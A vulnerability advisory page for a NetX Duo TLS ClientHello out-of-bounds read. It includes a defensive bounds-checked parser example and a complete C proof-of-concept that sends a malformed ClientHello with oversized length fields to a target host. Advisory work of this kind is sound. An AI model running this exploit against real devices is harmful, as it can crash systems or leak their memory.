Security Vulnerability Report
CVE-2025-55081 CVSS 9.1 CRITICAL

Published: 2025-10-15 11:15:39
Last Modified: 2025-10-27 19:03:21

Description

In Eclipse Foundation NetX Duo before 6.4.4, a module of ThreadX, the _nx_secure_tls_process_clienthello() function was missing length verification of certain SSL/TLS ClientHello message fields: the cipher suite length and the compression method length. An attacker-crafted message with values outside the expected range could cause an out-of-bounds read.
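The check the description says was missing, shown as an added example that is not NetX Duo's own code: a bounds-checked parser for the ClientHello body that validates each declared length field (session ID, cipher suites, compression methods) against the bytes actually present before it reads them. The field layout follows RFC 5246 section 7.4.1.2; the names `parse_client_hello`, `build_hello_body`, `struct client_hello` and the two check functions are this example's own, and the sample messages are constructed here (the inconsistent one uses the same 0xFF00 / 0xFF length values the advisory class describes).

```c
/* Added example: bounds-checked TLS ClientHello body parser (not NetX Duo code).
 * Field order per RFC 5246 7.4.1.2; everything else here is constructed. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

struct client_hello {
    uint16_t       version;
    const uint8_t *random;            /* 32 bytes, points into the message */
    const uint8_t *session_id;
    uint8_t        session_id_len;
    const uint8_t *cipher_suites;
    uint16_t       cipher_suites_len; /* in bytes, 2 per suite */
    const uint8_t *compression;
    uint8_t        compression_len;
};

/* True if `need` bytes remain after `pos`; pos <= len is an invariant. */
static int need_bytes(size_t len, size_t pos, size_t need)
{
    return need <= len - pos;
}

/* Parse a ClientHello body (the bytes after the 4-byte handshake header).
 * Returns 0 on success, -1 if any declared length would overrun the buffer
 * or violates the protocol's own bounds. Extensions are not parsed here. */
int parse_client_hello(const uint8_t *msg, size_t len, struct client_hello *out)
{
    size_t pos = 0;
    if (!need_bytes(len, pos, 2 + 32 + 1)) return -1;    /* version, random, sid len */
    out->version = (uint16_t)(msg[0] << 8 | msg[1]);
    out->random  = msg + 2;
    pos = 34;

    out->session_id_len = msg[pos++];
    if (out->session_id_len > 32) return -1;             /* SessionID<0..32> */
    if (!need_bytes(len, pos, out->session_id_len)) return -1;
    out->session_id = msg + pos;
    pos += out->session_id_len;

    /* cipher_suites<2..2^16-2>: declared length must be even, nonzero, and
     * the declared bytes must actually be present. This is the check whose
     * absence allows the out-of-bounds read described above. */
    if (!need_bytes(len, pos, 2)) return -1;
    out->cipher_suites_len = (uint16_t)(msg[pos] << 8 | msg[pos + 1]);
    pos += 2;
    if (out->cipher_suites_len < 2 || out->cipher_suites_len % 2 != 0) return -1;
    if (!need_bytes(len, pos, out->cipher_suites_len)) return -1;
    out->cipher_suites = msg + pos;
    pos += out->cipher_suites_len;

    /* compression_methods<1..2^8-1>: nonzero length, bytes present. */
    if (!need_bytes(len, pos, 1)) return -1;
    out->compression_len = msg[pos++];
    if (out->compression_len == 0) return -1;
    if (!need_bytes(len, pos, out->compression_len)) return -1;
    out->compression = msg + pos;
    pos += out->compression_len;
    return 0;
}

/* Constructed sample builder: a minimal TLS 1.2 ClientHello body with one
 * cipher suite and the null compression method. The two length fields are
 * caller-supplied so the same builder yields a consistent and an
 * inconsistent message. Returns the body length (41 bytes). */
size_t build_hello_body(uint8_t buf[64], uint16_t cs_len_field, uint8_t comp_len_field)
{
    size_t n = 0;
    buf[n++] = 0x03; buf[n++] = 0x03;            /* client_version: TLS 1.2 */
    memset(buf + n, 0x41, 32); n += 32;           /* random (constructed filler) */
    buf[n++] = 0x00;                              /* session_id length 0 */
    buf[n++] = (uint8_t)(cs_len_field >> 8);      /* cipher_suites length (declared) */
    buf[n++] = (uint8_t)cs_len_field;
    buf[n++] = 0x00; buf[n++] = 0x2F;             /* TLS_RSA_WITH_AES_128_CBC_SHA */
    buf[n++] = comp_len_field;                    /* compression_methods length (declared) */
    buf[n++] = 0x00;                              /* null compression */
    return n;
}

/* 1 if a consistent message parses and the fields come out as expected. */
int check_well_formed(void)
{
    uint8_t buf[64]; struct client_hello h;
    size_t n = build_hello_body(buf, 2, 1);
    if (parse_client_hello(buf, n, &h) != 0) return 0;
    return h.version == 0x0303 && h.cipher_suites_len == 2 && h.compression_len == 1;
}

/* 1 if declared lengths larger than the data present are rejected. */
int check_rejects_oversized_lengths(void)
{
    uint8_t buf[64]; struct client_hello h;
    size_t n = build_hello_body(buf, 0xFF00, 0xFF);
    return parse_client_hello(buf, n, &h) == -1;
}

/* 1 if a message truncated by one byte (missing compression method) is rejected. */
int check_rejects_truncated(void)
{
    uint8_t buf[64]; struct client_hello h;
    size_t n = build_hello_body(buf, 2, 1);
    return parse_client_hello(buf, n - 1, &h) == -1;
}

int main(void)
{
    printf("well-formed accepted: %d\n", check_well_formed());
    printf("oversized lengths rejected: %d\n", check_rejects_oversized_lengths());
    printf("truncated rejected: %d\n", check_rejects_truncated());
    return 0;
}
```

The pattern to take from this is the `need_bytes` call before every read of a declared-length field: the declared length is untrusted input until it has been compared with the bytes remaining in the received record, and a parser that indexes past the record on the strength of the declared value alone is exactly the CWE-125 read the advisory describes.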

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:eclipse:threadx_netx_duo:*:*:*:*:*:*:*:* - VULNERABLE
Eclipse Foundation NetX Duo < 6.4.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
/*
 * CVE-2025-55081 PoC - Eclipse ThreadX NetX Duo TLS ClientHello OOB Read
 *
 * This PoC demonstrates the vulnerability by sending a crafted TLS ClientHello
 * message with malformed cipher_suites_length and compression_methods_length
 * fields to trigger an out-of-bounds read in _nx_secure_tls_process_clienthello().
 *
 * Vulnerability: Missing length verification of ciphersuite length and
 * compression method length in TLS ClientHello message processing.
 *
 * Affected: Eclipse Foundation NetX Duo before 6.4.4
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>        /* close() */
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* TLS Record Type */
#define TLS_CONTENT_TYPE_HANDSHAKE 0x16
/* TLS Handshake Type */
#define TLS_HANDSHAKE_CLIENT_HELLO 0x01
/* TLS Version */
#define TLS_VERSION_MAJOR 0x03
#define TLS_VERSION_MINOR 0x03 /* TLS 1.2 */

/*
 * Build a malicious TLS ClientHello with oversized cipher_suites_length
 * and compression_methods_length to trigger OOB read.
 */
unsigned char *build_malicious_client_hello(int *out_len)
{
    unsigned char *buf = (unsigned char *)malloc(1024);
    int offset = 0;

    if (buf == NULL) {
        *out_len = 0;
        return NULL;
    }

    /* TLS Record Header */
    buf[offset++] = TLS_CONTENT_TYPE_HANDSHAKE;
    buf[offset++] = TLS_VERSION_MAJOR;
    buf[offset++] = TLS_VERSION_MINOR;
    /* Record length placeholder (2 bytes) */
    int record_len_pos = offset;
    buf[offset++] = 0x00;
    buf[offset++] = 0x00;

    /* Handshake Header */
    buf[offset++] = TLS_HANDSHAKE_CLIENT_HELLO;
    /* Handshake length placeholder (3 bytes) */
    int hs_len_pos = offset;
    buf[offset++] = 0x00;
    buf[offset++] = 0x00;
    buf[offset++] = 0x00;

    /* Client Version */
    buf[offset++] = TLS_VERSION_MAJOR;
    buf[offset++] = TLS_VERSION_MINOR;

    /* Random (32 bytes) */
    memset(&buf[offset], 0x41, 32);
    offset += 32;

    /* Session ID Length (0 - no session ID) */
    buf[offset++] = 0x00;

    /* === MALICIOUS: Cipher Suites Length === */
    /* Set to 0xFF00 (large value) to trigger OOB read */
    buf[offset++] = 0xFF;
    buf[offset++] = 0x00;
    /* Only provide 2 bytes of actual cipher suite data */
    buf[offset++] = 0x00;
    buf[offset++] = 0x2F; /* TLS_RSA_WITH_AES_128_CBC_SHA */

    /* === MALICIOUS: Compression Methods Length === */
    /* Set to 0xFF (large value) to trigger OOB read */
    buf[offset++] = 0xFF;
    /* Only provide 1 byte of actual compression method data */
    buf[offset++] = 0x00; /* null compression */

    /* Fill handshake and record lengths */
    int hs_len = offset - hs_len_pos - 3;
    buf[hs_len_pos]     = (hs_len >> 16) & 0xFF;
    buf[hs_len_pos + 1] = (hs_len >> 8) & 0xFF;
    buf[hs_len_pos + 2] = hs_len & 0xFF;

    int rec_len = offset - record_len_pos - 2;
    buf[record_len_pos]     = (rec_len >> 8) & 0xFF;
    buf[record_len_pos + 1] = rec_len & 0xFF;

    *out_len = offset;
    return buf;
}

int main(int argc, char *argv[])
{
    char *target_ip = "192.168.1.100";
    int target_port = 443;

    if (argc >= 2) target_ip = argv[1];
    if (argc >= 3) target_port = atoi(argv[2]);

    printf("[+] CVE-2025-55081 PoC - NetX Duo TLS ClientHello OOB Read\n");
    printf("[+] Target: %s:%d\n", target_ip, target_port);

    /* Create socket */
    int sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        perror("[-] Socket creation failed");
        return 1;
    }

    struct sockaddr_in addr;
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(target_port);
    if (inet_pton(AF_INET, target_ip, &addr.sin_addr) != 1) {
        fprintf(stderr, "[-] Invalid target address: %s\n", target_ip);
        close(sock);
        return 1;
    }

    /* Connect to target */
    printf("[*] Connecting to target...\n");
    if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        perror("[-] Connection failed");
        close(sock);
        return 1;
    }

    /* Build and send malicious ClientHello */
    int payload_len;
    unsigned char *payload = build_malicious_client_hello(&payload_len);
    if (payload == NULL) {
        perror("[-] Payload allocation failed");
        close(sock);
        return 1;
    }

    printf("[*] Sending malicious ClientHello (%d bytes)...\n", payload_len);
    printf("[*] Malicious cipher_suites_length: 0xFF00\n");
    printf("[*] Malicious compression_methods_length: 0xFF\n");
    send(sock, payload, payload_len, 0);
    printf("[+] Payload sent. Check target for crash or memory disclosure.\n");

    free(payload);
    close(sock);
    return 0;
}

References

https://github.com/eclipse-threadx/netxduo/security/advisories/GHSA-5vrv-8j5h-h6h6 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-55081", "sourceIdentifier": "[email protected]", "published": "2025-10-15T11:15:39.063", "lastModified": "2025-10-27T19:03:20.530", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Eclipse Foundation NextX Duo before 6.4.4, a module of ThreadX, the _nx_secure_tls_process_clienthello() function was missing length verification of \ncertain SSL/TLS client hello message: the ciphersuite length and \ncompression method length. In case of an attacker-crafted message with \nvalues outside of the expected range, it could cause an out-of-bound \nread."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", 
"Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-126"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:threadx_netx_duo:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.4.4.202503", "matchCriteriaId": "24743F34-C00F-4CB2-BCEE-2BB29FA265CB"}]}]}], "references": [{"url": "https://github.com/eclipse-threadx/netxduo/security/advisories/GHSA-5vrv-8j5h-h6h6", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}